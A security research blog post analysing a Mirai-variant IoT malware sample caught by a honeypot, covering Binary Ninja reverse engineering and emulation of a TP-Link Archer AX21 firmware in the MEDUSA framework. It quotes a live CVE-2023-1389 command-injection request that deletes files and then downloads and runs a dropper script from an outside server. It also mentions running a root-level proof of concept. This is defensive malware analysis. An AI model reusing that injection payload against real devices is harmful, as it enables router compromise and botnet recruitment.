IoT Malware Analysis with MEDUSA

Motivation

At CyberDanube, we’re driven by our curiosity about fresh embedded/IoT security topics. We therefore constantly research new threats, using IoT/IIoT honeypots on the public internet to intercept attacks in real time. These insights fuel our internal research and the development of our firmware emulation solution MEDUSA. During an analysis of one of our deployed honeypots, we encountered a command injection exploit attempt that caught our attention. The related vulnerability is publicly disclosed as CVE-2023-1389. The honeypot logged the following request:

::ffff:80.94.92.60 - - [12/Mar/2024:07:50:22 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" "-"

The corresponding exploit specifically targets TP-Link Archer AX21 (AX1800) devices.

The log indicates that the attacker attempts to download and execute a malicious script (tenda.sh) from a server. This script serves as a dropper for multiple binaries, which appear to be cross-compiled for different architectures.
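To make the injected command chain easier to read, the country parameter from the log entry can be URL-decoded. The following is a minimal sketch using only Python’s standard library; the variable names are ours and purely illustrative.

```python
from urllib.parse import unquote

# Value of the `country` parameter, copied verbatim from the honeypot log entry.
encoded = (
    "$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244"
    "%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)"
)

decoded = unquote(encoded)

# Strip the surrounding "$(" and ")" and split the chain at the semicolons.
commands = [part.strip() for part in decoded[2:-1].split(";")]

for command in commands:
    print(command)
```

The decoded chain wipes the current directory, changes to /tmp, fetches tenda.sh, marks it executable, and runs it.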

Although the malware has previously been studied by other researchers (see https://blog.permafrostsec.com/posts/mirai-variant-cve-2023-1389/ and https://ducklingstudio.blog.fc2.com/blog-entry-231.html), they primarily analyzed the x64 version of the binary. Given that the exploit targets the TP-Link Archer AX21, we wanted to investigate whether the malware behaves or functions differently when run on the target device’s architecture.

Our plan involves building a digital twin using our SaaS solution, MEDUSA, to conduct dynamic analysis on the acquired malware. However, before proceeding, we aim to gain an overview and understanding of the sample’s behavior. Therefore, we initiated our study by examining the mipsel binary with the MD5 hash 9c044ba07dc2e144b68c13d6507e39c5.
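Before working on a sample, it is worth confirming that the file on disk matches the stated hash. A minimal sketch of such a check follows; the helper names are hypothetical, and the path passed in is whatever the sample is called locally.

```python
import hashlib

# MD5 of the mipsel sample as stated in the text.
EXPECTED_MD5 = "9c044ba07dc2e144b68c13d6507e39c5"


def md5_of_file(path, chunk_size=65536):
    """Return the hex MD5 digest of the file at `path`, read in chunks."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def is_expected_sample(path):
    """True if the file at `path` matches the hash given in the text."""
    return md5_of_file(path) == EXPECTED_MD5
```

Calling is_expected_sample on the downloaded binary returns True only if it is byte-identical to the sample described here.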

Static Analysis

For static analysis, we decompressed the sample with UPX and loaded it into Binary Ninja. We observed that many functions exhibit a similar structure, parsing arguments and making syscalls with predefined values. For instance, the connect syscall function had the following format:

0040ef00  int32_t sub_40ef00(int32_t arg1, int32_t arg2, int32_t arg3, int32_t arg4)
0040ef20      int32_t $v0 = syscall(0x104a)
0040ef28      if (arg4 != 0)
0040ef3c          open_call_file_ptr = $v0
0040ef40          $v0 = 0xffffffff
0040ef4c      return $v0

To streamline the task of renaming functions in the binary and gain a clearer understanding of its functionality, we opted to utilize Binary Ninja’s API. We constructed a semicolon-separated list containing syscall names and their corresponding numbers, which we sourced from https://syscalls.w3challs.com/?arch=mips_o32

The script iterates over all functions, checks if a syscall has been found, and if so, looks up the syscall number to rename the function accordingly. We highly recommend using the snippet editor plugin for Binary Ninja scripting to facilitate this process.

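from binaryninja import LowLevelILOperation

# `bv` (the current BinaryView) is provided by Binary Ninja's scripting console / snippet editor.

def get_syscall(func):
	# Return the value of $v0 at the first syscall instruction as a hex string, or None.
	for inst in func.llil.instructions:
		if inst.operation == LowLevelILOperation.LLIL_SYSCALL:
			return hex(inst.get_reg_value("$v0").value)
	return None

def get_syscall_name(hex_number):
	# Look up the name in the semicolon-separated list (one "name;number" pair per line).
	# The number column must be formatted like the output of hex() for the comparison to match.
	file_path = '/path/to/mipsel_syscall'
	with open(file_path, 'r') as file:
		for line in file:
			parts = line.strip().split(';')
			if len(parts) == 2:
				name, hex_val = parts
				if hex_val == hex_number:
					return name
	return None

def main():
	# Rename every function that wraps a known syscall and count the renames.
	num = 0
	for func in bv.functions:
		v0 = get_syscall(func)
		if v0:
			syscall = get_syscall_name(v0)
			if syscall:
				func.name = syscall
				num += 1
	print("Renamed {} functions".format(num))

main()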
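One possible refinement, which is not part of the script above: get_syscall_name reopens the list for every function, so the table could instead be parsed once into a dictionary. The sketch below assumes the list stores one name;number pair per line, with the number formatted the way Python’s hex() prints it. The helper name and the three sample entries are illustrative, not the contents of the original list.

```python
def load_syscall_table(lines):
    """Map hex syscall numbers (as printed by hex()) to syscall names."""
    table = {}
    for line in lines:
        parts = line.strip().split(";")
        if len(parts) == 2:
            name, hex_val = parts
            table[hex_val.lower()] = name
    return table


# Illustrative excerpt; MIPS o32 syscall numbers start at 4000 (0xfa0).
sample_lines = ["bind;0x1049", "connect;0x104a", "socket;0x1057"]
table = load_syscall_table(sample_lines)

# 0x104a (4170 = 4000 + 170) is the number seen in the decompiled wrapper.
print(table.get(hex(0x104A)))
```

With the dictionary in place, each lookup is a single table.get call instead of a pass over the file.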

After execution, the Binary Ninja script has renamed 50 functions. Continuing our study, we proceed to reverse the main function at address 0x409254. Our analysis reveals that during startup, the malware deletes the executable from the filesystem and appears to access watchdog-related devices to prevent the system from rebooting. Subsequently, it binds itself to TCP port 39123, changes its process name, and forks.

The child process enters a while true loop with two separate paths (the third being an exit condition), indicating that this will be our primary communication loop.

Depending on a flag, the binary follows one of two paths. One appears to handle sending data to the C&C server, while the other receives and processes data. In the listening state, the received buffer is passed as a parameter to the function located at 0x40061c (do_stuff_with_buf).

From the initial static analysis, we can draw several conclusions:

The malware is designed to be used in a botnet.
There are no apparent signs of anti-debugging techniques.
The malware is likely not persistent and only executes in memory.
For dynamic analysis, we may require an internet connection, as without it, the binary might trigger the exit condition prematurely.

Other researchers have noted that the binary attempts to terminate network monitoring applications such as tcpdump, tshark, or Wireshark. However, the sample we obtained did not appear to possess these capabilities. In fact, the execve syscall was not even detected in the binary, which could suggest that the infected machine is solely being used as a denial-of-service bot. Nevertheless, this remains speculative.

Digital Twin with MEDUSA

We utilized firmware version 1.0.5 Build 20221116 for hardware version 4.6 (available at https://static.tp-link.com/upload/firmware/2023/202306/20230601/Archer%20AX21_V4.6_221116.zip) as our base. After uploading it to MEDUSA with the default configuration, we downloaded the built image for local usage. After setting up a virtual bridge (virbr0), we initiated the emulation and were greeted with the motd banner. To assess emulation fidelity, we started the firmware without any modifications.

+------------------------------------------------+
| MEDUSA v1.3 (dynana)                           |
|                                                |
| firmware location:      /medusa/rootfs         |
| static utils:           /medusa/utils          |
|                                                |
| Start exploring your firmware by executing     |
| $ medusa                                       |
|                                                |
+------------------------------------------------+
medusa:~$ medusa start
[...]
wireless is starting...
pcnet32 0000:00:13.0 eth0: link up
saveconfig() begin
saveconfig() end
init_all_vif_name
DEVICES=
wifi_init 
config_profile_set, DfsEnable=0>>/etc/wireless/RT2860AP/RT2860_5G.dat
config_profile_set, IEEE80211H=0>>/etc/wireless/RT2860AP/RT2860_5G.dat
config_profile_set, DfsZeroWait=0>>/etc/wireless/RT2860AP/RT2860_5G.dat
config_profile_set, DfsDedicatedZeroWait=0>>/etc/wireless/RT2860AP/RT2860_5G.dat
config_profile_set, DfsZeroWaitDefault=0>>/etc/wireless/RT2860AP/RT2860_5G.dat
wifi_reload
========= don't cli WIFI-led when booting or not cal
[IPTV] WAN_PHY_IF=eth1.1
[IPTV] LAN_PHY_IF=eth0.2

The resulting ps output appeared promising, and there were also some active network services, as indicated by the netstat output. However, the web server didn’t seem to be running. Consequently, we restarted the emulation and began debugging the uhttpd service.

 482 root     /usr/bin/ledctrl
 488 root     /usr/bin/ledctrl
 489 root     /usr/bin/ledctrl
 495 root     /sbin/hotplug2 --override --persistent --set-rules-file /etc/hot
 548 root     udhcpc -t1 -A3 -b -R -O search -O staticroutes -p /var/run/udhcp
 984 root     lock /var/run/dnsproxy.lock
1985 root     /usr/bin/factory_reset
2007 root     /usr/sbin/sysmond
2029 root     /usr/bin/tmpServer
2030 root     /usr/bin/tdpServer
2031 root     /usr/bin/pfclient
2038 root     /usr/bin/pfclient
2040 root     /usr/bin/pfclient
2041 root     /usr/bin/pfclient
2047 root     /usr/sbin/tsched
2049 root     /usr/bin/tdpServer
2050 root     /usr/bin/tdpServer
2082 root     /usr/bin/sync-server
2111 root     /usr/sbin/imbd
2134 root     /usr/bin/client_mgmt
2206 root     /usr/sbin/dosd
2262 root     /usr/sbin/dosd
2263 root     /usr/sbin/dosd
2432 root     tddp
2456 root     /usr/bin/cloud-brd -c /etc/cloud_config.cfg
2462 root     /usr/bin/cloud-brd -c /etc/cloud_config.cfg
2463 root     /usr/bin/cloud-brd -c /etc/cloud_config.cfg
2483 root     /usr/bin/cloud-client
2489 root     /usr/bin/cloud-https -c /etc/cloud_https.cfg
2494 root     {cloud_https_boo} /usr/bin/lua /usr/sbin/cloud_https_bootreq
2518 root     {S99detPdmaHung} /bin/sh /etc/rc.common /etc/rc.d/S99detPdmaHung
2829 root     {S99zswitch_led} /bin/sh /etc/rc.common /etc/rc.d/S99zswitch_led
2832 root     /usr/bin/switch_led
2877 root     /usr/sbin/conn-indicator
2992 root     /usr/sbin/crond -c /etc/crontabs -l 5
medusa:~$ netstat -tuln
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       
tcp        0      0 127.0.0.1:20002         0.0.0.0:*               LISTEN      
udp        0      0 0.0.0.0:34062           0.0.0.0:*                           
udp        0      0 0.0.0.0:1040            0.0.0.0:*                           
udp        0      0 0.0.0.0:20002           0.0.0.0:*                           
udp        0      0 :::1                    :::*

To investigate why the service exits, we entered the target firmware using msh (an alias for medusa sh static) and added the line set -x to /etc/init.d/uhttpd. This allowed us to trace the code execution. Upon examining the trace output, it became evident that the service file attempted to execute the functions config_load and config_foreach.

medusa:~$ msh
target:/$ /etc/init.d/uhttpd boot
+ START=50
+ SERVICE_DAEMONIZE=1
+ SERVICE_WRITE_PID=1
+ UHTTPD_BIN=/usr/sbin/uhttpd
+ PX5G_BIN=/usr/sbin/px5g
+ OPENSSL_BIN=/usr/bin/openssl
+ ALL_COMMANDS=start stop reload restart boot shutdown enable disable enabled depends 
+ list_contains ALL_COMMANDS boot
+ local var=ALL_COMMANDS
+ local str=boot
+ local val
+ eval val=" ${ALL_COMMANDS} "
+ val= start stop reload restart boot shutdown enable disable enabled depends  
+ [  start stop reload restart !=  start stop reload restart boot shutdown enable disable enabled depends   ]
+ [ boot = reload ]
+ [ -z  ]
+ [ boot != help ]
+ which lock
+ lockfile=/var/run/uhttpd.init.lock
+ lock /var/run/uhttpd.init.lock
+ boot
+ start
+ config_load uhttpd
+ [ -n / ]
+ return 0
+ config_foreach start_instance uhttpd
+ local ___function=start_instance
+ [ 2 -ge 1 ]
+ shift
+ local ___type=uhttpd
+ [ 1 -ge 1 ]
+ shift
+ local section cfgtype
+ [ -z  ]
+ return 0
+ lock -u /var/run/uhttpd.init.lock

Upon searching for the function definitions, we discovered that config_load returns 0 if the environment variable IPKG_INSTROOT is set. When the function returns without executing uci_load, the variable CONFIG_SECTIONS remains empty, so config_foreach returns without any further execution.

#/etc/functions.sh:
config_load() {
    [ -n "$IPKG_INSTROOT" ] && return 0
    uci_load "$@"
}
config_foreach() {
	local ___function="$1"
	[ "$#" -ge 1 ] && shift
	local ___type="$1"
	[ "$#" -ge 1 ] && shift
	local section cfgtype
	[ -z "$CONFIG_SECTIONS" ] && return 0
	for section in ${CONFIG_SECTIONS}; do
		config_get cfgtype "$section" TYPE
		[ -n "$___type" -a "x$cfgtype" != "x$___type" ] && continue
		eval "$___function \"\$section\" \"\$@\""
	done
}
#/lib/config/uci.sh:
uci_load() {
	local PACKAGE="$1"
	local DATA
	local RET
	local VAR
	_C=0
	if [ -z "$CONFIG_APPEND" ]; then
		for VAR in $CONFIG_LIST_STATE; do
			export ${NO_EXPORT:+-n} CONFIG_${VAR}=
			export ${NO_EXPORT:+-n} CONFIG_${VAR}_LENGTH=
		done
		export ${NO_EXPORT:+-n} CONFIG_LIST_STATE=
		export ${NO_EXPORT:+-n} CONFIG_SECTIONS=
		export ${NO_EXPORT:+-n} CONFIG_NUM_SECTIONS=0
		export ${NO_EXPORT:+-n} CONFIG_SECTION=
	fi
	DATA="$(/sbin/uci ${UCI_CONFIG_DIR:+-c $UCI_CONFIG_DIR} ${LOAD_STATE:+-P /var/state} -S -n export "$PACKAGE" 2>/dev/null)"
	RET="$?"
	[ "$RET" != 0 -o -z "$DATA" ] || eval "$DATA"
	unset DATA
	${CONFIG_SECTION:+config_cb}
	return "$RET"
}

So, why is the environment variable set in the first place? It appears we stumbled upon a minor bug in the analysis engine. MEDUSA seems to identify the firmware as an OpenWrt variant, which isn’t entirely incorrect. However, as a consequence, an extra environment variable is added to /etc/profile, which isn’t necessary for this particular image.

#MEDUSA nvram simulation
export LD_PRELOAD=/medusa/extensions/nvram/libnvram.so
#MEDUSA OpenWrt INSTROOT not set
export IPKG_INSTROOT=/

After removing the variable, we modified the service file to launch the web server in the foreground and manually started ubusd. Subsequently, executing /etc/init.d/uhttpd boot led to a functional web server.
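Removing the variable amounts to dropping the export line from /etc/profile. Here is a minimal sketch of that step, assuming the profile is edited from a host-side copy of the root filesystem where Python is available. The function name is hypothetical and this is not a MEDUSA feature.

```python
import re

# Matches an `export IPKG_INSTROOT=...` line, ignoring leading whitespace.
INSTROOT_EXPORT = re.compile(r"^\s*export\s+IPKG_INSTROOT=")


def drop_instroot_export(profile_text):
    """Return the profile text without any `export IPKG_INSTROOT=...` line."""
    kept = [
        line
        for line in profile_text.splitlines(keepends=True)
        if not INSTROOT_EXPORT.match(line)
    ]
    return "".join(kept)


# Profile excerpt as shown in the text.
profile = (
    "#MEDUSA nvram simulation\n"
    "export LD_PRELOAD=/medusa/extensions/nvram/libnvram.so\n"
    "#MEDUSA OpenWrt INSTROOT not set\n"
    "export IPKG_INSTROOT=/\n"
)
print(drop_instroot_export(profile), end="")
```

A shell that has already sourced the profile keeps the variable until it is unset or the shell is restarted.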

To verify the application’s functionality, we tested the PoC for CVE-2023-1389 as provided by Tenable (https://www.tenable.com/security/research/tra-2023-11). And indeed, the PoC resulted in the creation of a file by the root user.

target:/$ ls /tmp/
client_list.json   fstab              multi_lang         spool
cloud-brd          is_online          once_online        state
cloud.pid          is_online_v6       once_online_v6     stats
cloud_https.pid    lib                productinfo        sync-server
cloud_service.cfg  lock               resolv.conf        wportal
dropbear           log                resolv.conf.auto
dut_bootdone       luci-indexcache    run
etc                merge-conf.xml     sfe_status
target:/$ saveconfig() begin
saveconfig() end
mergeconfigbycountry() begin
mergeconfigbycountry() end
saveconfig() begin
saveconfig() end
mergeconfigbycountry() begin
mergeconfigbycountry() end
target:/$ cat /tmp/pwned 
uid=0(root) gid=0(root) groups=0(root),10

Dynamic Analysis

For dynamic analysis, we aimed to understand which files the malware accessed, alongside an strace output, to compare against our static analysis results. MEDUSA offers a fantastic utility called oprobe, which essentially traces all files and devices opened by a process across the entire system. Here’s an example of the oprobe output while running the exploit:

medusa:~$ medusa oprobe
sh-506                  0xfffffffe          "/lib/libjson.so.0"
sh-506                  0x4                 "/usr/lib/libjson.so.0"
sh-506                  0x4                 "/lib/libc.so.0"
sh-506                  0x4                 "/lib/libc.so.0"
sh-506                  0x4                 "/lib/libc.so.0"
sh-506                  0x4                 "/lib/libc.so.0"
id-507                  0x4                 "/tmp/pwned"

For strace’ing we rely on the statically compiled utilities provided by MEDUSA. This collection of debugging binaries is invaluable in situations where the target lacks any built-in tools. You can locate these utilities within the target’s path at /medusa/utils.

target:/$ ls /medusa/utils/
bash       gdbserver  perl       strace
busybox    ncat       socat      tcpdump

Additionally, we launched a Wireshark instance on our host machine, specifically on virbr0, just in case the binary attempted to terminate network monitoring applications. Here’s how our tracers are set up within the emulation:

medusa:~$ medusa oprobe > /oprobe.log &
[1] 558
medusa:~$ msh
target:/$ /medusa/utils/strace -s200 -o parent.log ./mpsl

After starting the malware we were a little bit surprised by the results. The oprobe output revealed some intriguing file accesses. We’re not entirely sure of their purpose, but our network capture didn’t indicate any data exfiltration. Yet, the most surprising discovery was probably the behavior of the fork logic.

mpsl-269                0xfffffffe          "/dev/watchdog"
mpsl-269                0xfffffffe          "/dev/misc/watchdog"
strace-266              0x4                 "/etc/localtime"
kvpb5gdjdvpf3tj-271     0x0                 "/tmp"
kvpb5gdjdvpf3tj-272     0x0                 "/proc/"
kvpb5gdjdvpf3tj-272     0x1                 "/tmp"
kvpb5gdjdvpf3tj-272     0xfffffffe          "/opt"
kvpb5gdjdvpf3tj-272     0xfffffffe          "/home"
kvpb5gdjdvpf3tj-272     0x2                 "/dev"
kvpb5gdjdvpf3tj-272     0x4                 "/var"
kvpb5gdjdvpf3tj-272     0x5                 "/sbin"
kvpb5gdjdvpf3tj-271     0x1                 "/tmp/etc"
kvpb5gdjdvpf3tj-271     0x2                 "/tmp/etc/config"
kvpb5gdjdvpf3tj-271     0x1                 "/tmp/multi_lang"
kvpb5gdjdvpf3tj-271     0x1                 "/tmp/stats"
kvpb5gdjdvpf3tj-271     0x0                 "/var"
kvpb5gdjdvpf3tj-271     0x1                 "/var/passwd"
kvpb5gdjdvpf3tj-271     0x1                 "/var/samba"
kvpb5gdjdvpf3tj-271     0x2                 "/var/samba/var"
kvpb5gdjdvpf3tj-271     0x4                 "/var/samba/var/locks"
kvpb5gdjdvpf3tj-271     0x2                 "/var/samba/lib"
kvpb5gdjdvpf3tj-271     0x2                 "/var/samba/private"
kvpb5gdjdvpf3tj-271     0x1                 "/var/Wireless"
kvpb5gdjdvpf3tj-271     0x2                 "/var/Wireless/RT2860AP"
kvpb5gdjdvpf3tj-271     0x1                 "/var/lock"
kvpb5gdjdvpf3tj-271     0x1                 "/var/run"
kvpb5gdjdvpf3tj-271     0x1                 "/var/tmp"
kvpb5gdjdvpf3tj-271     0x2                 "/var/tmp/pc"
kvpb5gdjdvpf3tj-271     0x2                 "/var/tmp/TZ"

While the parent process followed our expectations, the child took a different route. Instead of quietly binding and listening in the background, it behaved like a fork bomb, gobbling up system resources until the oom-killer stepped in. Initially, we wondered if the aim was to exhaust all threads, preventing management services like SSH or HTTP from restarting, thus securing the machine against other malicious actors. But upon reflection, that theory didn’t hold up. We didn’t find any process-killing logic, and other researchers hadn’t reported similar findings. Plus, why would they want to exhaust the TCP stack on the host system?

[   5061]     0  5061       77        0    12288        0             0 kvpb5gdjdvpf3tj
[   5062]     0  5062       77        0    12288        0             0 kvpb5gdjdvpf3tj
[   5063]     0  5063       77        0    12288        0             0 kvpb5gdjdvpf3tj
[   5064]     0  5064       77        0    12288        0             0 kvpb5gdjdvpf3tj
[   5065]     0  5065       77        0    12288        0             0 kvpb5gdjdvpf3tj
[   5066]     0  5066       77        0    12288        0             0 kvpb5gdjdvpf3tj
oom-kill:constraint=CONSTRAINT_NONE,nodemask=(null),task=kvpb5gdjdvpf3tj,pid=5066,uid=0
Out of memory: Killed process 5066 (kvpb5gdjdvpf3tj) total-vm:308kB, anon-rss:0kB, file-rss:0kB, shmem-rss:0kB, UID:0 pgtables:12kB oom_score_adj:0
target:/$ net_ratelimit: 895 callbacks suppressed
TCP: too many orphaned sockets
TCP: too many orphaned sockets
TCP: too many orphaned sockets
TCP: too many orphaned sockets
TCP: too many orphaned sockets
TCP: too many orphaned sockets
TCP: too many orphaned sockets
TCP: too many orphaned sockets
TCP: too many orphaned sockets
TCP: too many orphaned sockets

We couldn’t quite figure out why the malware acts so differently on mipsel. To us, it seemed like someone relied a little too much on their cross-compilation toolchain and forgot to test the result properly. In contrast, when running the armv7 sample, the process tree and netstat output match what you’d expect from a Mirai variant.

 135 root     {sikoik36psnshpl} 1vn1r611wkn1mm3il2n8d8bc
 166 root     {sikoik36psnshpl} 1vn1r611wkn1mm3il2n8d8bc
 167 root     {sikoik36psnshpl} 1vn1r611wkn1mm3il2n8d8bc
 168 root     {sikoik36psnshpl} 1vn1r611wkn1mm3il2n8d8bc
# netstat -tuln 
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       
tcp        0      0 127.0.0.1:39123         0.0.0.0:*               LISTEN

This minor oversight not only renders the device inoperable but also significantly increases network bandwidth usage. We captured roughly 30 seconds of network traffic with tcpdump for each variant and counted the transmitted bytes: the mipsel variant transferred about 2,938 times more data than its armv7 counterpart (2,459,120 versus 837 bytes).

======================================================================
| IO Statistics (mipsel)          || IO Statistics (armv7)           |
|                                 ||                                 |
| Duration: 30.0 secs             || Duration: 28.3 secs             |
| Interval: 30.0 secs             || Interval: 28.3 secs             |
|                                 ||                                 |
| Col 1: Frames and bytes         || Col 1: Frames and bytes         |
|---------------------------------||---------------------------------|
|              |1                 ||              |1                 |
| Interval     | Frames |  Bytes  || Interval     | Frames |  Bytes  |
|---------------------------------||---------------------------------|
|  0.0 <> 30.0 |  33983 | 2459120 ||  0.0 <> 28.3 |     14 |     837 |
======================================================================
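The factor can be recomputed directly from the counts in the table. The short sketch below also normalizes by capture duration, since the two captures differ slightly in length; the variable names are illustrative.

```python
# Frame and byte counts taken from the two IO statistics tables.
mipsel = {"duration_s": 30.0, "frames": 33983, "bytes": 2459120}
armv7 = {"duration_s": 28.3, "frames": 14, "bytes": 837}

byte_ratio = mipsel["bytes"] / armv7["bytes"]
frame_ratio = mipsel["frames"] / armv7["frames"]

# Compare bytes per second instead of raw totals.
rate_ratio = (mipsel["bytes"] / mipsel["duration_s"]) / (
    armv7["bytes"] / armv7["duration_s"]
)

print(f"bytes:   {byte_ratio:.0f}x")
print(f"frames:  {frame_ratio:.0f}x")
print(f"bytes/s: {rate_ratio:.0f}x")
```

Whichever measure is used, the mipsel variant generates three orders of magnitude more traffic than the armv7 variant.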

The malware has been designed for denial-of-service attacks, but on mipsel it essentially starts an amplification DoS attack on its own C&C server. Malware that poses a risk to itself reaches a new level of irony.

Conclusion

Our IoT malware analysis has been a great learning experience and also produced some entertaining results. We’ve shared insights into our methodology, using static analysis tools alongside our system emulation framework, MEDUSA. The development of a functional digital twin opens up possibilities for future security research or the deployment of honeypot traps. And along the way, we’ve shown the critical role of integration tests (or lack thereof, for those with malicious intentions).

This analysis was conducted by Sebastian Dietz on behalf of CyberDanube Security Research.

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on embedded systems, firmware analysis with digital twins, and information security risk assessment. Currently, he is working on the further development of the firmware emulation framework MEDUSA. Sebastian has proven his technical expertise at various CTFs such as the “Austrian Cyber Security Challenge”, which he won in his category with an impressive number of points. Most recently, Sebastian was involved in uncovering zero-day vulnerabilities and publishing security advisories.
